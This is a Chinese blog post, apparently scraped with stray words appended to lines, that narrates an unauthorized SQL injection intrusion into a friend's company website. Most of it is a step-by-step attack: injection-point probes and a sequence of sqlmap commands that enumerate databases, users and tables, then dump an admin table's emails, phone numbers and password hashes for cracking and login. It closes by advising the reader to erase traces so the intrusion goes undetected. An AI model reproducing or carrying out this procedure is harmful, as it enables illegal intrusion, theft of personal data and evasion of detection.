最近在研究Web安全相关的知识,特别是SQL注入类的相关知识。接触了一些与SQL注入相关的工具。周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞。不试不知道,一试还真TM得逞了,心里有些小激动,特在此写博文一篇,来记录下我是如何一步步攻破这家互联网公司的。javascript
【做案工具介绍】php
(1) AppScan渗透扫描工具java
Appscan是Web应用程序渗透测试舞台上使用最普遍的工具之一。它是一个桌面应用程序,它有助于专业安全人员进行Web应用程序自动化脆弱性评估。python
(2) Sqlmap渗透测试工具sql
Sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。数据库
【做案细节以下】安全
首先使用Appscan工具,对www.xxx.com互联网公司的官网进行扫描,扫描结果以下:
工具
在这56个安全性问题中,找到你感兴趣的连接,例以下面这条:sqlserver
http://www.xxx.com/system/cms/show?id=1测试
为什么要挑出这一条呢?由于它对于SQL注入比较典型,下面普及下SQL注入经常使用手法。首先用以下语句,肯定该网站是否存在注入点:
http://192.168.16.128/news.php?id=1 原网站
http://192.168.16.128/news.php?id=1’ 出错或显示不正常
http://192.168.16.128/news.php?id=1 and 1=1 出错或显示不正常
http://192.168.16.128/news.php?id=1 and 1=2 出错或显示不正常
若是有出错,说明存在注入点。
在判断完http://www.xxx.com/system/cms/show?id=1该连接存在注入点后,接下来就启动咱们的渗透测试工具Sqlmap,进行下一步的注入工做,详细过程以下:
1) 再次确认目标注入点是否可用:
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1
参数:
-u:指定注入点url
结果:
注入结果展现:
a. 参数id存在基于布尔的盲注,便可以根据返回页面判断条件真假的注入。
b. 参数id存在基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增长)来判断。
c. 数据库类型为:MySql 5.0.12
2) 暴库全部数据库:
一条命令便可曝出该sqlserver中全部数据库名称,命令以下:
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 –dbs
参数:
–dbs:dbs前面有两条杠,列出全部数据库。
结果:
结果显示该sqlserver中共包含3个可用的数据库。
3) 获取当前使用的数据库
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 –current-db
参数:
–current-db:当前所使用的数据库。
结果:
4) 获取当前数据库使用帐户
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 –current-user
5) 列出sqlserver全部用户
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 –users
6) 获取当前用户数据库帐户与密码
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 –passwords
结果显示该用户可能无读取相关系统的权限。
7) 列出数据库中的表
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store –tables
参数:
-D:指定数据库名称
–tables:列出表
结果:
结果显示共列出了69张表。
8) 列出表中字段
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin –columns
参数:
-D:指定数据库名称
-T:指定要列出字段的表
–columns:指定列出字段
结果:
9)暴字段内容
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C “ag_id,email,id,mobile,name,password,status” –dump
参数:
-C :指定要暴的字段
–dump:将结果导出
若是字段内容太多,须要花费不少时间。能够指定导出特定范围的字段内容,命令以下:
python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C “ag_id,email,id,mobile,name,password,status” –start 1 –stop 10 –dump
参数:
–start:指定开始的行
–stop:指定结束的行
此条命令的含义为:导出数据库xxx_store中的表mall_admin中的关于字段(ag_id,email,id,mobile,name,password,status)中的第1到第10行的数据内容。
结果以下:
经过上图,咱们能够看到admin表中的用户信息了。咱们将password字段经过md5解密,能够获得hash的原文密码,经过用户名和密码,咱们就能够登陆该网站了。
至此,咱们已成功入侵到一家公司的后台,并拿到了相关的数据。不过要在这里提醒你:成功入侵只是成功了一半,另外最重要的一半是把屁股擦干净,不让别人发现你了!
本文由腾讯WeTest团队提供,更多资讯可直接戳连接查看:http://wetest.qq.com/lab/
上一页